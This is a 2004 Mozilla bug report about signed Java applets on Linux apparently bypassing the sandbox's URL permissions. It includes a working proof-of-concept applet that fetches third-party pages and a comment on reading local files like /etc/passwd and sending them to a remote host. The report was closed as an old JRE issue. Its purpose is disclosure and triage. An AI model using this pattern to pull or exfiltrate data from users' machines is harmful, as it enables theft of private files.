Java applets bypass sandbox URL permission

RESOLVED INVALID

Status

Core Graveyard
Java-Implemented Plugins
--
critical
RESOLVED INVALID
14 years ago
6 years ago

People

(Reporter: Ivano Picco, Assigned: Blake Ross)

Tracking

Trunk
Other
Linux

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: announced JRE vulnerability in 1.4.2_05)

(Reporter)

Description

14 years ago
User-Agent:       Mozilla/5.0 (compatible; Konqueror/3.2; Linux) (KHTML, like Gecko)
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3

It is possible to bypass java sandbox's protection on URL permission using a 
signed Java applet, especially with the URLConnection.openConnection method. 
This bug could be used to load webpages or files from third sites without 
specifically permission, and a specific applet can act like an unsecured 
XMLHTTPrequest. 
Also (not tested yet) you can send confidential data to a remote host using  a 
simple signed applet with an approach similar as that explained bottom. 
 
This bug also appear in firefox 0.9.1 and on the latest trunk build, only the 
linux version 
 

Reproducible: Always
Steps to Reproduce:
1. Java enabled 
2. Try to load a remote signed java applet with this lines: 
 
 
URL imsURL = new URL("www.google.com"); 
       
       
      	URLConnection connection = imsURL.openConnection(); 
      	connection.setDoInput(true); 
      	BufferedReader in = new BufferedReader(new 
InputStreamReader(connection.getInputStream())); 
            while ((ln = in.readLine()) != null) { 
                //showStatus(ln); 
                if (tempString == null) { 
                    tempString = ln; 
                } else { 
                    tempString = tempString + ln; 
                } 
            } 
       
       theResponse = tempString.trim(); 
       out.println(theResponse); 
 
Actual Results:  
You can see the google homepage. 

Expected Results:  
Throw a security exception, like the firefox windows version and all the 
mozilla build, since the user explicity give a permission using java policy.  

I give you a working example:  
 
import java.applet.Applet; 
import java.awt.*; 
import java.net.*; 
import java.io.*; 
import java.security.*; 
 
 
public class jpost extends Applet { 
        String ln; 
        String tempString = null; 
	String UrlEr; 
 
  public static void main (String[] args) 
  { 
  } 
 
  public void init() { 
  } 
 
  public String postXML(String theURL) { 
       
   UrlEr = theURL; 
   AccessControlContext acc = AccessController.getContext();   
    
   String Resp = (String)  AccessController.doPrivileged( 
    new PrivilegedAction() { 
     public Object run() { 
 
   
  String theResponse = "Did work"; 
  tempString=UrlEr; 
    int c; 
    StringBuffer str; 
    //SocketPermission p1 = new SocketPermission("*.net", 
"connect,accept,resolve"); 
    //p2 = new SocketPermission("", "connect,accept"); 
    //p3 = new SocketPermission("", "connect,accept"); 
     
 
    str= new StringBuffer(((int)1024)); 
    try { 
      URL imsURL = new URL(UrlEr); 
       
       
      	URLConnection connection = imsURL.openConnection(); 
      	connection.setDoInput(true); 
      	BufferedReader in = new BufferedReader(new 
InputStreamReader(connection.getInputStream())); 
            while ((ln = in.readLine()) != null) { 
                //showStatus(ln); 
                if (tempString == null) { 
                    tempString = ln; 
                } else { 
                    tempString = tempString + ln; 
                } 
            } 
       
       theResponse = tempString.trim(); 
 
     in.close(); 
    } catch(MalformedURLException mue) { 
      showStatus("Illegal URL: " + mue); 
      theResponse = "Illegal URL: " + mue; 
    } catch(IOException ioe) { 
      showStatus("IOException: " + ioe); 
      theResponse = "IOException: " + ioe; 
    } catch(Exception e) { 
      showStatus("Error: " + e); 
      theResponse = "Error: " + e; 
    } 
     
    return(theResponse); 
   } 
  } 
  , acc);  //End Privileged section 
 
      return(Resp); 
 
  } 
  public String setText(String s){ 
   String text= "working"; 
   return (text); 
   } 
} 
 
if you use this in a webpage with a javascript like this: 
resp = document.applets["jpost"].postXML("http://www.google.com/"); 
 
you can load the google webpage 
 
my jre is: Java(TM) 2 Runtime Environment, Standard Edition (build 
Blackdown-1.4.1-01) 
Java HotSpot(TM) Client VM (build Blackdown-1.4.1-01, mixed mode) 
my linux box: Fedora Core 2, Linux pc32119 2.6.6-1.435.2.3custom #1 Fri Jul 23 
12:03:47 CEST 2004 i686 athlon i386 GNU/Linux with KDE 3.2.3
Do you have this example loaded on a web page somewhere, or could you attach the
compiled class to the bug? Would make things easier.

So Mozilla on Linux doesn't have this problem, only Firefox on Linux? The
linux-only part doesn't bother me if there's some bug in the JRE port, but I
thought Mozilla and Firefox shared all the same Java glue code. I'd really like
to blame this on Java, but if Mozilla works and Firefox doesn't...

Kyle, any ideas?
Whiteboard: [sg:fix]
(Reporter)

Comment 2

14 years ago
Hi!, sorry but I spent my last two weeks on holidays.  
About your questions: 
- No, I haven't a web page somewhere, and I can't send you the compiled class 
because it's on my computer at office. Maybe I will send it to you Monday. 
- Yes, only Firefox on Linux. Mozilla doesn't have this problem. 
 
Bye, 
Ivano Picco 
(Reporter)

Comment 3

14 years ago
Ok, I made a simple webpage whith a working example of the bug.
This is the link:

http://www.mandrile-melis.it/aqupi-temp/java-bug/

it works, it loads the google homepage (without images) and a local webpage.
(Reporter)

Comment 4

14 years ago
Tested with Mozilla 1.7.2 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.2)
Gecko/20040803, This version HAS THE BUG TOO (is it a gecko issue??). I learn
much more about the URLConnection methods, and i found that is possible to make
an output connection with the same code I give in the example above. See this link:
http://www.ictp.trieste.it/~manuals/programming/Java/tutorial/networking/urls/readingWriting.html
With this you can get any local file (/etc/passwd???) (because the applet is
signed, so it's possible to get access to local file (it's a correct behaviour))
and send it to any remote host (by the bug) different from which the applet is
loaded (also ftp).
 
Severity: normal → critical
(Reporter)

Comment 5

13 years ago
Also tested in Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8a4) Gecko/20040927,
the bug is still here..... Could you please confirm this bug?
Component: General → Java-Implemented Plugins
Product: Firefox → Browser
Version: unspecified → Trunk
Are you sure this isn't a JRE bug? Several sandbox vulnerabilities have been
announced since your rather old version.  Get 1.4.2_06 at least.
(Reporter)

Comment 7

13 years ago
Ok, it's true.. I try with: java version "1.5.0_01"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_01-b08)
Java HotSpot(TM) Client VM (build 1.5.0_01-b08, mixed mode, sharing)
Thanks for your help.

Status: UNCONFIRMED → RESOLVED
Last Resolved: 13 years ago
Resolution: --- → INVALID
Group: security
Whiteboard: [sg:fix] → announced JRE vulnerability in 1.4.2_05
Component: Java-Implemented Plugins → Java-Implemented Plugins
Product: Core → Core Graveyard
You need to log in before you can comment on or make changes to this bug.